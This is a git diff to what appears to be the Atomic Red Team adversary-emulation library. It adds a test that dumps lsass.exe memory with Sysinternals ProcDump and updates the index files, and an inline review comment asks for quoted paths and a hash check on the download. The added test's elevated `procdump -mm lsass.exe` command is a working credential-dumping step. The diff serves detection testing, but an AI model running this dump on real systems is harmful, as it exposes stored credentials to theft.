diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cab460c0..24db6df3 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -215,6 +215,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2efff797..f3318313 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -23,6 +23,7 @@ credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows T
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index afc3f27c..3f8b1a3d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -437,6 +437,7 @@
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index c55feaa0..d0355b01 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -47,6 +47,7 @@
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 568771e0..ec115ee4 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20519,6 +20519,47 @@ credential-access:
'
name: powershell
elevation_required: true
+ - name: Create Mini Dump of LSASS.exe using ProcDump
+ auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
+ description: |
+ The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
+
+ Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
+
+ If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_file:
+ description: Path where resulting dump should be placed
+ type: Path
+ default: C:\Windows\Temp\lsass_dump.dmp
+ procdump_exe:
+ description: Path of Procdump executable
+ type: Path
+ default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'ProcDump tool from Sysinternals must exist on disk at specified
+ location (#{procdump_exe})
+
+'
+ prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
+ Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+ New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
+ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+ executor:
+ command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n"
+ cleanup_command: 'del "#{output_file}" >nul 2> nul
+
+'
+ name: command_prompt
+ elevation_required: true
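Review bot: The paths substituted into `prereq_command` and the executor `command` are unquoted, so a `procdump_exe` or `output_file` value containing a space (an atomics folder under `C:\Program Files`, for instance) can break both the prerequisite check and the dump command, and the same applies to the `$env:TEMP` paths in `get_prereq_command`. Quote them: `prereq_command: 'if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}'` and `command: "\"#{procdump_exe}\" -accepteula -mm lsass.exe \"#{output_file}\"\n"`. The `get_prereq_command` also extracts and later runs, elevated, whatever `Procdump.zip` the download returns with no integrity check; comparing `(Get-FileHash "$env:TEMP\Procdump.zip").Hash` against a pinned expected value (hash to be supplied by the author) before `Expand-Archive` would keep the test from silently executing a substituted binary. The description hard-codes `c:\windows\temp\lsass_dump.dmp` although the location is the `output_file` argument, so `#{output_file}` would stay accurate when a caller overrides it. Since index.yaml appears to be generated from `atomics/T1003.001/T1003.001.yaml`, which is outside this chunk, these fixes belong in that file with the indexes regenerated.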
T1557:
technique:
external_references:
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 12664f66..e90f33b9 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -42,6 +42,8 @@ The following SSPs can be used to access credentials:
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
+- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
+
@@ -418,4 +420,58 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
+
+
+
+## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
+The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
+
+Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
+
+If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
+| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del "#{output_file}" >nul 2> nul
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
+Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
+Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+```
+
+
+
+